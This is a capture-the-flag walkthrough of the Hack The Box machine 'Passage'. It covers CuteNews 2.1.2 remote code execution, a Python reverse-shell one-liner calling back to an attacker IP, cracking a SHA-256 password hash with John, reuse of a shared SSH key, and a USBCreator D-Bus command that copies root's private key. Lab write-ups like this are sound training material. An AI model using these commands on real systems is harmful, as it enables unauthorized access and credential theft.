HTB Passage Walkthrough
We bypass the Fail2Ban system by doing manual enumeration, to discover a CMS system named CuteNews version 2.1.2 which is vulnerable to remote code execution vulnerability that will give us a shell on the server. Then we enumerate the web app files manually to understand how CuteNews works, and we discover that it stores users credentials in /CuteNews/cdata/users as Base-64 encrypted JSON objects. We finally root the box by exploiting a vulnerability in USBCreator D-Bus
Reconnaissance
We start with Nmap scan to check open ports and the services that are running on the server
nmap -sT -sC -sV 10.10.10.206- -sT to run TCP scan
- -sC to use Nmap default script scan
- -sV to enumerate service version
- Port 22 ssh is open and it runs OpenSSH 7.2p2
- Port 80 HTTP is open and it runs apache 2.4.18
I tried to run Gobuster, and Nikto but every time I run these tools I lose my connection to the server, and I get blocked for a minute.
When I went further with the manual enumeration and pressed on the first article “**Implemented Fail2Ban**”
I got this page
They have installed Fail2Ban which is an intrusion prevention software framework that protects computer servers from brute-force attacks it is able to run on POSIX systems that have an interface to a packet-control system or firewall installed locally, for example, iptables or TCP Wrapper.
So we can’t brute force the hidden directories or do any form of noisy scans.
So now we have two options:
- Either we write a stealthy python script to brute force the directories by sending one request every second(and this might take forever).
- Doing it manually.
So, for now, I’ll go with the manual enumeration. I checked the main page source and I saw that the machine is running a CMS named CuteNews
I navigated to
http://10.10.10.206/CuteNews/And I got a login page.
This page reveals the version of CuteNews that the server is running which is 2.1.2 that’s good info we can come back to that later
I tried the default creds like
admin:admin
admin:password
But didn’t managed to log in, and we know that we can’t brute force the system or we get banned, So I clicked on Register, and I created an account
And I have a user dashboard, I played around, and messed with it to find a way to upload a shell to the server, but I couldn’t.
Exploitation and gaining access
I checked Exploit-DB for vulnerabilities for CuteNews 2.1.2, and I got plenty of them
As we can see we have a Metasploit module which I tried, and it was effortless to gain access to the server using it, but let's ignore the Metasploit module and download the python script.
So I downloaded the first python exploit in the list and ran it
And the exploit allows me to execute commands on the server
Then I used a python reverse shell from pentest monkey to get a fully interactive shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.70",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'And I upgraded the shell that I got to a fully interactive TTY shell using
python3 -c 'import pty;pty.spawn("/bin/bash");'
ctl+z
stty raw -echo
fg
export TERM=xterm-256colorI checked for users that have access to the console and I got paul, and nadav
I tried to enter the directories of these users in /home/nadav and home/paul but I got permission denied
Then I started enumerating the web files in order to understand how CuteNews works, and hoping to find some sensitive data, and I discovered that it has a folder named users this folder contains users data encrypted in Base-64
The file that named “lines” contains all the users data as JSON objects, encrypted in Base-64
I copied its messy content and paste in an online tool for decrypting Base-64
After decrypting the file content, I got the password for paul, but it was encrypted as well
Identifying The Hash
I need to identify this hash, in order to know how to crack it, so I used the hash-identifier tool in Kali and the tool shows a high probability that the hash might be SHA-256
Cracking The Hash
We paste the hash to a file and we name it paul, then we use John to crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 paul
And we managed to crack the hash with John and the password is atlanta1
After we obtained paul password, we can try to switch user to paul
su paul
After few hours of enumerating and running privilege escalation scrips without getting any useful info, I looked into the /.ssh for the user paul, and I read the authorized_keys file and I found that paul and Nadav are using shared ssh key to log in to the machine
So I copied the private key “id_rsa” to my machine and I gave it the permission 600 using the command
chmod 600 id_rsaThen I tried to log in to the machine as nadav using this ssh key with the command
ssh -i id_rsa nadav@10.10.10.206And we owned the second user which is nadav
Privilege Escalation to root:
In nadav home directory we see a .viminfo file, which contains caching info for vim(this box taught me to not ignore such file while performing Priv Esc)
Inside this file we can see that the user nadav has missed with some .conf files, I searched for privilege escalation method related to these files, and I came across this article.
Which describe the exploit “A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password”
running the following command
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/rooting/id_rsa trueWill generate an id_rsa file, we use it to log in to the box as root using ssh from inside the box
ssh -i id_rsa root@127.0.0.1
